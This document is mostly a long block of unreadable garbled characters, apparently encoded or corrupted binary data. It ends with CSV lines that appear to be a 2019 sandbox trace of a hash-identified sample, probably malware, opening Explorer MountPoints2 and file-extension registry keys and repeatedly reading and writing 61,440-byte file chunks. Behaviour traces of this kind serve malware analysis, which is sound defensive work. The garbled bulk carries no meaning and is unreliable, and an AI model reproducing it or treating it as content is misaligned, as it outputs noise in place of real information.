?DR-f{i'sebbu
_[j|]WBM~eDFlfP^]^GCkrGGKK^BeG^Q]]^~|M
E\$]UQ
N@23pu!jd
UWYCDCKA
M{P/5,akdt
!(JyUH
N\tU^EGbC
A[X3TY
gd!!$5`
BUVXCV^[LbW?
6,8pIC"lwzdfq
x{rhmyvmqzloma|{~g
J^QG8e
_M4QKGX
Z^TDd&
R@MDUB
!(D[\TJIJEU]
bKGDWuK@G
qya!qedFH@
@P^GCBA[
ga vr65
)x hf!akft,6>3`s6
 11 ='tIPQEM
CluH@]^BG^
cDW_RTK
_sIDRBfZkKQV
6\P`B]
tMNCUuZ{
JK*$:5&& O
cess'kq
F~_cUDw]
lxg@WB~_r@EUCc^eGPZU
FkRVxH
iI[sHq
5</&6* VIO
gu}a`c;
\@bDRiI[Cp6!1,6
*bHR%h
]r^MWaUPZG
OCqyauucq
WaEUBHd
NYG+6"ONG!
<'6QxMu^K
]@fV]GPwO]S
FkRPS~
ceaog!6EEQV^[JjK>
^{UIuIf
6(16PcDr
DUCd_b
3Biwinu
zp|ozpq}p`u
@RgGRiI[O
]e1V@A
rPXT@NC5fu'|db
WYCDBH
$vCu!<7&hmj
!(JyUH
N\tU^EGbC
C`0rz'gj
@@MD[p
KKk~ec|
~xgu}x}sc`}/uu
j<am'tmtF
Ee![W@C
W[Y\]IAGGA
j7pwq0f
nEXC]N_
C\WPBDBN
kKWyCGBiQKuZ{
eb'''cj@
@QzRJI
v?>x}zx-l(pz*}wq
QXG[lgrm~6
<G~sQFU\
fBYCTt\UK
qyawwcq
QAmV6A
^GS[CV^[@
Gal!ztd`F
UR@MD_F2X[DRv
/lK^UB@CMT]
eGPZUtZNI
cwoa'ge
eV5FP@TO\SP
\UQZQXPM
Afb&%u`jG
[yr'mfx~!#-9~w'q~
OCN\qCR{GU
L6>:'1?%qIV'
EBzG\{T@uAf
ws|u{bw
~|!==|v!rxk.tt-/~v
GBV`UBQEM
tlfWWuIn
cetrwfj
TTRT	@
Agf%"qaj
	p(${sacbbgbv-04,!V^[N\q'
oEA!:0,#'
uELFCU
DfUBCY
nbkFWBaXDQ
GKKEDB[
w~gqyaaiq;iI[
Di		{_$> 
&;":*ReL
aibmutmcUCDB
FJNBC]
nYQTnE@
2V^[qya
WIPI.V[DWuHg
,?6lMOG
U@oP\ER
kJQXGYbQPXK
]YYFih
VX/\NtOoAM
qtyVW]aXBMXDYX_
GKm#0-
c_%.hg
">/-&,kCO
]IcLS{UN
fVHDORPI~y[SPCQ
UTCV"[
alz"v6b
_S*XZT
 [~NMYD
KBKPhmKADC@
bUP`GPKWfY_WIgLe
q7wur77@
\(PNHX
V[_G_[GFUO
\\5Z@\3GX
@jdtp!a0
GTGPIE
^_aqubj
E\,RYQN
BP\5SM
j7wzqb1@MD
Z@vK@G<
^J1C~om
 fIQ:'&'
Fwu~uby'opic,ihs
xz|if}
sv}mxxmxq}g
^@qY@)QO
RFQ?x^
Fe5P_S\
UK@GGKCVIO@
Afb&%u`jG
|P&@CTDl
oE[CEKI
bRVc@\\InRNYGqJg
1aut!71
P]7VBCT]3
KU^XCDEH
|UU|RIL
WIgTu@
q%-.ek'
[zr'`n{|'s/k~'"|{w|C
G]I1A[
NVCRd.
A^ME_VVpa=(T57
/XGUaD\B@gQ\BTwMn
`woaqac
G^I4X]BV*S
X2Q@OP
V5PZ	gVAC
KKW[@V^[
pIE-DSY/
%t~)3bv
]|x#8k~vz 
:|x!|pzt@NC
]2MJVAQBGpo
,GtOZe
clrsudb
SNIZ*{|;lx{ t{:+qpq,||@
C\>yPWC
Gj3PYUXO
=aYPDU^VzG
VYRphmmBU_rU@tHg
flmsw`q
]}| ?o
v&su=tpt{-|&
DaL[*V
`f#0$:~_
C\WPBDBN
kKWiFG^[bS\WIg
F77sz'`g
JIrWDX
!(PWWXJDKH
cWRh[U@JtMNAWuZ{
pv-(7b|@
AILBQWGxM1
G@IgX\LTuH`
j{s{vq
PIE]ADPU
#sp.lcr
o_^YOYO4
#Gc@90 7g^Y
|yu{sn-ww{;)#sq+}q
MB~eUDW\
kcNWCHJD\\
r@PXZUtZNIu
qya!qedFH@
oV]B]&
&0,!6FmAAIQ
f[>hpu*ysobuq 
^@gX\LT~QZT
}\YNVPoCWZUrMV
PVPV[	XQV
ceaog!6EEQD
bTViWIP
quqJgG
YBUTqS
>? lzf
cTWBrXSQT`QCY
cerruq
\U~Q]UI
q)7&c`})6
-:'7GHc
=/7(37$
C5*=*4=
><-;2QQIW@BTWDoTBC^^\
FJNBC]
nYQTnE@
2V^[qya
WIPI.VZ
,?6lMOG
':ljaVt||
\IgQ\BT|TTK
wGZKWW`CXJ@9<
VTS		[
GMFH@NC4VQ+IR_|]
cwoa6*=ADP_
YJQDY^]A
Hs=? !
\@cER/Q[
FQblVns~t
OCQULUXBMBK
woau+c
iI[AN~
aztS\D\~X\U
k^SQNIF
S[SVUW
aDUQVIo
XL^E\\
/fRtY]\~X\U
	r~wzodc
S[SVUW
GBiSIuZ{
^G4<077*q
Di6,n}
;q|o}qr{*li
Di		~K*
,'8(,3&
~^oVG@
DUWK_V
%[zC? &
qe;succ
0{uio|
&ynso-3
("0GbC
Dy}C@UmtYZC_CXWFiza}
A3GKsCUB[zC
#GBiGUg
me;succ
\@fPYMGbC
.HGaQ/
 /: mNKnm}pzxp
^Ej[RyV[
g]VV[C
% k`wdu
". ~mnCE`
z~|wo~|amnk
qadk,q
We/PRE\
%uz*4fw
TIN!GjERW^z\I|Ig
a`zmu``
+~r<9||z$~f/xr
VD^QL?"ma
WP\\BICCT_
sJVCXGr[\G{
eb'''cj@
YBUTqRT]Q_
qrqywt
]BfLL{VJ
q[TDUMP
UJ>pxg*q
@14%ps7j
OCJjKZU
ZBUWYCD
0"'hme
f{vj}`mws|}ac!|
`AV(PNHXc\_
`3"wwjjC
LxE]@IP=
bNS[~VOgu]
blsztcc
	,/'if.|wu/jz$%xzw 
X2[TMN
T\UKCA@VIO
j7pwq0f
BT^YJEBI
CVLgGMwHu
@gct'!1c
Zz(qj9-{qxu>~$rq+z|
5FT/\N
V[CDUloEA
/]P[DT
bgvzkck
@jdtp!a0
LX{}!`h}x{"-}acuxyli
	9oEA!:0,#'
/bd[\T
LbWYPUPcD MBR
D3QUvI
].T@'Ln
@14%ps7j
TM<.({sn
(/-kbgqya/5
LLU$s\QCCU
W{IMTCdXf@\MK
LgGOuHu
D:9&0< 'GA
ZbUQTvX
ii{}`m+
%3(l}x1~u
KJjvz~
DdK@GEuU
1Bi ,3!ohSGFZYL/
~K@G /
DMBGTG_McVp
HUpWCK^G
%vzq1|t:4ur}G?3@
@glwr'12D
M^[LbW;
7*/PEV6x}upf`
`A\AIQG{t
!MXGAX
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
lYO101
*VIQvCp
_~EZSWGvHrAGG_v[eBKXGO
bTPTdEN
lYO101
*VIQvCu
E]UT@z_lILVQxMfWQF
k6"aiqe
s_AK%K@G+6"ONG!
<'6QxMpIC
]{NXG@YLjLK^U
(VA"P[TyY
lqWXM4
fKYMTvY[T
\CxU&K
GKCVIO@
IDcfz&wj1
O_5vb1iva~
VP]UCNBFPT
aGMFr[\G
@gct'!1c
BRV[FM\I
~GS}@GBi
MsO3FN
#zxa1p
x!k<x|% xmtx"{,
PI~{YSPCQ	
cdzs|bc
DVJ1]n
IDbV^*B\
54wq|j2
])ii{i|
amn9$-&;0=1GA
A[qCD'""1 
KOPM_M
_|@TLUA|Dn[@WCvCp
wvq/4pi
HM181<2nca
SB_C_WEluEL
tAUZDDYX_
zIZYV]Qp@
GMFf__NxJ
kUXUvY[T
\CxU&K
9;@PQW
HF0U^-CQZ(PN 
Gtx+udevF
_{.t`=xvwp.=,'p~-wr
qY@}UI
*+7<U_
W`E^QG^mRpIVIQ6[aE
N@23pu!jd
XKF@NqXIawcb
UK-UvM
PD1	bVX
2f&r|1g
RjKZU~CAGKW09]%#=5(~@Q6
fIQ:'&'
,>,nab=qt
vt~g~k-
"?+17mkH[FUBm_nCYDR
@DERUAM
oPSQDGjK
;G_[ !&.g
qpICT>Y\U
cmaog?#dENGbC
l(y`ul\BS
!H_#hpsc}wopHKf
~uwtbytnegpzu
PSVQT	
uDYDGjK
NIQ*&7&(q
Zcessubb
~E]RUC~^`UV	
hqwYEgjur
UEq\]YKVFmAWWCQ
%qxr6-!ok'rp
@MD`c'zrbd
UCICDT_A
mJ`*!&0
^w]Nh'
W`ETQG^mRpIVIQ6[dR
7ltrrk0C
Dn['00
X\UyP_P
PIFwSSG_QKW+ =<!=&2pic
Pd~GtY]\
cetrwfj
\Bc\3@
Fa6wp#2g
jqevcg>,/K18'VIOF[f2
ko}pic,ddfG
^}FONGF}V`UV
e1zttdkAM
S0$wxm
UTqSST
 3-nae`|ew
yyq{sn+4
"/7:&"
MHGANc
WyWsEVQT@fPTU
-EM FRR
F\,AG$
RT\K2Z
G_pSDEPBG
eQE}W	
c-ssucc
!(JyUH
N\tU^EGbC
	6!%t{4VFG
E\$]UQf@NC5fu'|db
V|M:;7
$=2EIP
TDtUCYBGHc
VA#_Q"1'!
zPU^}Q
tUFYSUxMNeLFB^U
vq~}gg|
JpWFKOGO
qEX3DLD
Q\q\\_WsZ
CJuHUtYNI
VNLfN]SPMYV_dIGT
gd!!$5`
[Q~BGBi
2dEN6x}
\A#VF^G
k"0:\\_QP@Y^CdI@U
V\`B_DQU	
XvY\TO
\@cESz][
mkH[FUBm_kTQT
PSVQT	
OCpIEy@ULgG
2QUQ'0.aiq
PEVU>Y\U
a0aog;
ZXvY\U
\@cDP{GU
	[mkH[FUBm_nCYDR
A3GKmFU^iI[#
;G_[ !&.g
qpICT>Y\U
1gaog;
ZXvY\U
\@cDSsGU
9>+!.4VrIFTGd^
gBKXG4
QXP*woa
64m\GLgG
c-ssucc
^~E]SWDmJ`
azqGRz\I
y^GC]VjKBBVP
S[SVUW
q'&$, 'PU
\EUuHf
 ?'G^mDn[
!(NBfPUE\
|W^B[PqIPBWB
3K^ER~
ceaog!6EEQV^[JjK>
^{UIuIe
980 PcD`UV
!(NBcD[{\H
~_BGVMcQATIPl
cwoa764K_VPU
{UIuHf
 ?'G^mDn[
!(NBcD[{\H
{^QTU}UFEG^
q'&$, 'PU
aeaog=
VrIDTAbM{P
UAcEUzWL
yZCPCAgWBTIPQ
GMQ\@NC4VW
OCqyauucq
WaEUBHgYNYG+6"ONG!
<'6QxMpIC
\@aP^@\`QYV
3K^ER~
ceaog!6EEQV^[JjK>
^{UIuIe
980 PcD`UV
!(NBcD[{\H
~_BGVMxU]F@GF
cwoa764K_VPU
{UIuHf
 ?'G^mDn[
!(NBcD[{\H
~_BGVMxU]F@GFj
FnEXC]%
cwoa764K_VPU
{UIuHf
 ?'G^mDn[
/fRaESrU@
|XRSYjKBBVP
S[SVUW
q'&$, 'PU
wyk`w<
WA@G^m
N}YWP{T@
}_SV]aPKXUF
@DERUAM
{P_DUdEN
GKK !1:g
qpIEm\G
cesstac
^6E]RUB~Tt[XG
^@bLRrTI
	r~fpjlO
j4p&tj1
N@	 ZZ
{_ZDQqHu/&
tqxuekt
XRHXqCI,v
j7wzqb1@MD
FQqX[]N_
edwwuq^(
	&*cz}9I	R	
QX^PJWCMVO
HF1ez!vggA
KU^XCDEH
|US|RIL
WIgTu@
d1'!uj1
u(j~ukCSQ
VYAUCICY&]
gBYDUvY\U
.wNIgac
2f&r|1g
LzG]@IP-RtN
dV0VUPN
N@23pu!jd
ZVY\UCHABGA
v;'&"!:=EaMFINJKcNW
W}WA@Q@
JCfW^v
N@23pu!jd
^J-&gu}
,?:pcm
%?,ibKH
^cE]RU_
VrIYUCd_bUQT
TPQUU	V
QXG?GKm'
qe;succ
x3uiosecc}lx};
0?@IP#
YIWCQh}KnxMA_WMlnX^TXFAiz[BFVLXtQ@CKCL>qNG
UK>~[A
^GJWnz2zma\
54wq|j2
X~EONG
*][XzQMuZZ(
cdzs|bc
cF[.W@O
VP]UCNBFPT
aGMFr[\G
@gct'!1c
BRV[FM\I
~GScEG^[4UZB
ga vr65
G]I4UUAT,
#\YTEY
_YUTCIDEWX
nAKXGr[\G
@gct'!1c
BUPXAAKW
pIE{BULgG
qN`FH@cl!pqg0
FZ(QJK_|y|`>p)pj1qjkc--5D
fDYFGpQ
^_aqubj
j4p&tj1
x{gu}%%-6 < +7"mx
 JINNIZ4
DU^CY^\C~WD
HG`[e_QDQH
USV^PWF
JKZUC[_V
E}W6':
$?&GiZu
</&hmcZ
^6E]RUB~Tt[XG
USV^PWF
JKZUC[_V
dEN!G@G'0
\@vY]W~CAGCp6W>&=
MZxKFU
QUQBU]
-t).-+4
!l*-6]1
7GMFANxTCrYNhDC_U
@DERUAM
{P_DUdEN
K@G ,07 >q
cesstac
^6E]RUB~
lAxiI]_mXT]XDYX_SYe
W]GKKL[@U
U]#PWQ
[!u}|7{z=ktvwF?i
alz"v6b
qXIawcb
UK-UvM
PD1	bVX
2f&r|1g
/[XG0&
cwNIgac
N\d]^UlMO
," pea
@`[1PV
USZSX@
1azwt11CJ
TM7_1AYA<
m":'KKLM^GJjK
BUTqSRWCQ
80G~^MeBXMU
FKRV^K
ii{}`m+
%3(l}x1~u
]AkWNi
KJjf]ZTMzy~qECKUWEfUEB[ZWr`[_KOKQAlgTR
04aogec
@T\{GUg
*'G_v_/BYDU
yru`nseecw{mqegvp
^@qY@)QO
RFQ?x^
Fe5P_S\
@j!AG]XJ
_X\UDHAA\C
pICPtYNI
eb'''cj@
BUPXAAKW
pIEeGUPUt
@uu}/`e D
gKXDUqX^P
jfaogga
TSRA+T!MG
^GS[CV^[@
6gz!|bd
*)$?lu1ketyl<4qip
*+7<U_~aYP
_^luHA]WPIP2
USV^PWF
^GQYCV^[DEN7
K@Gqya
EEQBBI
&GUg*2CHd:9&aiq
woau+c
x{uinrmp~g 
*81  mJ`
LZ~Q_BFUPhVo[SCVCVWDl`X\QVYChpW^PQ\DtIP
AQF?f_
2f&r|1g
^_aqubj
E\,RYQN
PY\C2GXV_^WQpH
/bd[\T
LbWYPUPcD MBR
JCfW^v
N@23pu!jd
^J-&gu}
=30qipqya/5
LLU$}YSB_B]VVpu
q{JFTM
oPn}^L^Ma_YYEA
em`votCNA_U
PTT~W 
q'&$, 'PU
qF[k_;_^DB_] [FI
V,ZsXWW
VpEW_UK
Z}EVnW
BUWYQyx[
kU^`EUEHdTU[UpKu
aeaog1g
@P[_@okD
^GS[CV^[@
xQM&M`GJ
`l&q|1j
|z';>%fd6|yehm0$p
\@qY@-
uEL7:40
fUBCY^
WXMY^__BR
WUhGG[BGHc
I\w|,vf} je 't
EEu|,|c~p;e1}g#C98
IDbV^*B\
54wq|j2
bxrr b~
]xMQUBJy}
]JpKGjKXW
BUVYCDPU
qXIawcb
gd!!$5`
KV^[LbW?
6,8pIC7x}utgg
{ii{kqep~g,`ib7!0
XCRo)[
J^^Yd&
R@MDUB~aM
aerzujb
QQF,Su
WzRJ!J4
D2aqz|2`G
_zRAN_
k0wrhbbG
QkQ\SI
\~DTR\C
VuHFPJz_gVCH
VTS		[
GMFH@NC4VQ5LRCNn
q3*/  *QXGO
bgwaiq?RzCNYG&'
UBQDY^
\~DTR\C
VuHFPJz_bAKXG
PVPV[	XQV
ceaog5:NIQI
7(&xjsb
UPRUT]
!(NBy_{E_WUB
LeL APQ
VY\]QUQ
/[XG!7
c-srwc5
^~E]@hxmTrHMUJe_bRPV
GeMu_^V^M
K@G ,07 >q
me;succ
B_\s_U
Z^~C	RUA{Dn[
^p_rEQWWGjGJ\
VIQdUDW^L
G^N2%3&!~m
XvY\G 4
[w[]WVPcDvKDG_v
Fjbrt}02
VX^QQUQ
Hx50K~aM&;7
*:=VaCLME
4K@GIIt
CYBUTp
WG_QCp4967;
<'G~^MeBXMU
F_^]RK
(91b{h=s
_wETSUBxWpLMKCa\pICP
pqynyp#K@GQUQ
TEA2_WD
gwoa!$
MoMLXP
Y[C,_gFP
DTUCjYCT
^@mYV APQ
QTQQUQ
cessucc
UJ6\fQ
jar!'25
VY\TAMQXG	UeM
me;sue7
LErEQWWG
G^NW@@GH
UCICDU]
/XGSTwP\\
ddqv|}c
ZvK@GO
}_ @ER@0]1QR
7g wv52
N@	-VOI
zra<"w~ps~d}yq#;NIQ
iI[zL:
Gpo:61,6<5VpuKBF
^DfUBB
PVPV[	XQV
]qX[]AM
cUDfQ]
]gTuLbW>7&1
[XGQxM:.
\IgQ\BT|TTK
qC_Gw^QQ_
df'q&g`DM
@IPyVr[XG
RhdiWItAg
cbrqpj}
q:jt04bvw1ml1|c
U_~uEBPIL
9(Z\N=
LXr<<-76a
a|a~zM
[w[]WVPcDvKDG_v
Fjbrt}02
YDUvY]W
WwXURS
yWuKB\E2
EEQBBI
6FjK?0aog
+b z&cc
"W`hG@
W{IMTCdXf@\MK
(VVU{Q
w%*)6 [_VU
7UQTvK@GN\d:9&
\{LCRPAmJ`MFUQxM0QWSIZT
7T^-D\Zz
ddt{&2q
USD_BHA9(
QsKA\]dZdPEVQ
pqynyp#K@GQUQ
QTvY\T
\{LCRPAmJ`MFUQxM0QWSIZT
7T^-D\Zz
ddt{&2q
VY]WE[_V
DUvY\T
\{LCRPAmJ`MFUQxM5F_C
vx{m1$
DR-8<*+)"amn
B_C_VE>oKBF
=4BR_R]QC~HrR^_C\B
OCDENSCIQXG
<=+0~{d
j^VD@P@PecYZAM_MRFluEL
PTDo!J
7g wv52
/WA@SB
dTSeEG
stS\D\uAf
ws|u{b|
9;@PQW
GBR	FN
Z@Q%\[
j0qz'jb
}C	[RCx^!
VIQb_gPEV
HY_B@FI
!(pWW~IUWzUIrIe
clpaiqg
[.{v`:ql0ktyg;g0qaDM
Vj)PTCXK
Vpu_^TM[Q:*
PIPqXIawcb
UK-UvM
PD1	bVX
2f&r|1g
qXIawcb
UK-UvM
PD1	gAP
6dz!qjg
CXGqXIawcb
UK-UvM
PD1	bVX
Gbl!w|gb@NCD
#CAGzL:
CXGqXIawcb
UK-UvM
PD1	gAP
 z)dk'
N@	-VOI
zra<-moczo}coj/')G_[
@gG+H_7)
* 7< MJV~{K
BU^DfT
OCPIE_CDPU
&GUg/%KXG
qqyas=cc
Fx{uior6fpil:
 >'7PcD.	'
KJAPFQlodiP]C^_DefY^S^EFemEKAGBVbWBQEM
JCfWX]'Z	T
jar!'25
wu}|w_O
YE\!WJ	M^G|
alz"v6b
#DRSf]@Xr
eE@UBJg
cbrqpj}
XBuZEQ
9'egv j|!
JCXBw\
]\,UTQ
\![:rc0vrir{M#cx
_YUTCIDEWX
gVCHd]^U
1aut!71
YP\K.U'HM
QX^PJWCMVO
1fww&fdGJ
zXhxAE
%G_KDUTcOA
HM>6: ?ko}
7(0GKcNW
clrsudb
WJ6VfEZ
G4UR]#[U
`1q q`5C
phkFtY]\
cetrwfj
\Bc\6W
QG\#[U
7g wv52
\yPZ]N_a
~wedm~w(G%+5[_V
]lYOVWBmJ`
gd!!$5`
VY]WC[_V
0"'hma
LzG]@IP-RtN
dV0VUPN
JCw@\X
17"%ve7
@`aw pd6D
RFpG~cPWTpZS\BC
	vw{||yzlpicp
w%*)6 [_VGA
LJU>Y\Ug
@0woa+
&ONGB7VrIDUBeWpIC
]x^]GCkOW
epedxcg{
FCvUQEP
\tqz&g~&9bvx!
1azwt11CJ
mbraHYq
UCdENQ|QOI
GVN&\B^A
~$} cp!kkqp&B
Fts*|extg43kxg
WP\\BICCT_
gGZVId]^U
1aut!71
YP\K.U'HM
\WXV\I
zKFFEC@c
1fww&fdGJ
A@[USd@VZ
\qX[]N_jINF}U
G_QzLY
X\9\\_SQE
VrHDUCvCu
G_[EDUO
qwoa)#
K@GlMO
kW/_q]E
[__lQUVYVEM
vbXGST
gTuu^K'0
qe;succ
x3uio|
rp|}ac-
<#'G^m
YIWCQh}KnxMA_WMlnX^TXFAiz[BGVLXtQ@CKCL>qNG
UK>fGQ
jl"p bj@
;[XG!1
ThW]AQuZZ(
cdzs|bc
_AQ-TZ
Agf%"qaj
rPXTO\Q
BlC]RG^m
J}DTU@UihsgJg
jdssrba
I\xr'jkx,vv)9}rz-{w'
	UB8n^_SW
~oWDBULXt
jM?1&16q^(
@`[1PV
USZSX@
7U^L\$K2
@glwr'12D
: 6(6=V_
\@tPEQ
CYEmuX\
XyG@Cm}_ZD]UYEA
SWwCXC
FkRPS~
ceaog!6EEQV^[JjK>
^{UIuIe
6(16PcDr
DUCd_c
EAgkorlbkt~dhdapk
Ue/ZWF
[KQC>/
]B4V^_CKQ=a|ajf_NYO
KaoQKCE\]
#MF\J5\2CP
BPTK_VFK
)U@'Kc
d0%svj6
FUGbBZ(
OFPP^HK
bbqu|e5_p
LzG]@IP-RtN
dV0VUPN
N@23pu!jd
ZVY\UCH
e6;&1$':MB
LzG]@IP-RtN
dV5A]@
ddt{&2q
Ix*V9AYA8:,
$77KXKMBC
FQYmUPTKycM\Q]e
^XDYP_]G\
gBKXG 
QUQ'0.aiq
PICVId
c-ssucc
mWASIbe~V\]eST^^YC^@
HUpWCK^G
%vzq1|t:4ur}G?3@
1azwt11CJ
pIC7x}utgg
Z|EONG
JCc@PM
gd!!$5`
VY]TC[_V
18u^K'0n}sbg
]BsPBU{ROI
TPQUU	V
HUrUCK^G
Y[*gbg
!(qgsr|cj
CgV7WX
\PCV"[
alz"v6b
NIlW]U
9	N@~4
KF@Nqya'2
6QEPGHc
w=~ubysncuch
cDW_RTK
_sIDRBfZn\YMV
FzETVL
w%*)6 [_VU
%K@GN\d:9&
lS]_^XF_P
wgCOp{snkuxu
vw{||yvlu~k`w
w1&": V^[
{UIuHf
0>1G^mV:IDUCd^4
KXGEuSH
xiHS}qeckuweoedt`
\E`WNiQK
SC91Y]]
EJ>zDEA
]]We$K
WP\\BICCT_
b\RFjKXW
q7wur77@
CWRP]DGJ
fWWsYG
0`t&#c`
VP]UCNBFPT
dPEVQtYNI
eb'''cj@
CUW^BFG@
aGKaFWQVIi
MsO3FN
j7pwq0f
zr|8l&dk0qw`n71$4
FUGbBZ(
e_VV[C
9aYP!0-7
6!QEMLpg
HLl+XU\\
w]\FIP
lxg@WB~_r@EUCc^`PXJ
tMNCUuZ{
JK?00:6'6O
cesr&0q
FtUC[D^A
HL~Dn[
6_W7_qzYRAYULyy
c\EDYYVAiSO^PGVIF[WlfIQ	@YGFH@S[&R@UN
b7!"#`eF
BUWXADPU
M~G21n}sbg
}xgu}wgbpil6kcd!6@
FJ>wLFC
NCPSBloCW
cdzs|bc
DVJ1]n
IDbV^*B\
54wq|j2
OADEN	
6arntb6
QsKA\]dVaGMF
PVPV[	XQV
w%*)6 [_VGA
DJU>Y\U
7eaog?#tMNWIl	+
BQDY__
QsKA\]dVdPEVQ
RZ%U[^T}
.Z^5PCA6&0
^j_*UQU
i}q[JT
_BqY_MOC@[_Lx[
7g wv52
/WA@SB
lSVwFUCyoiWItAg
cbrqpj}
q:j{*%q
f(sz*p
M[QjsEP^G
M@FG^QJKcNW
^}WA@Q@
C@4UUAT'
7ltrrk0C
XiI[KW\
CICDU\A
lMO6x}
[w[\RVPcDvKDG_v
ddt{&2q
6 *amn
+_VDGQCWloEA
CJ`TFGYMcVgJ@]VB\Clc_T^Y
h_YWG^Q
S[SVUW
VId_\U
!0$*6'![
beaog=
WA@G^m
\R[kNGU
sX\_ZW
tP@IXMD
HU6MFRIZS
AVHXs	e!]Z
ZWF2QFMP
OCANfWDQ
^KaoQKCE\]
bRPVsPBT
7ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001c0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001cc","hKey->0x000001c0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001cc","lpValueName->Generation"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001cc","hKey->0x0000011c","lpSubKey->FileExts"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000001cc","lpSubKey->."
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x000001cc","lpSubKey->."
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_CLASSES_ROOT","lpSubKey->."
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_CLASSES_ROOT","lpSubKey->SystemFileAssociations\."
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_CLASSES_ROOT","lpSubKey->."
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
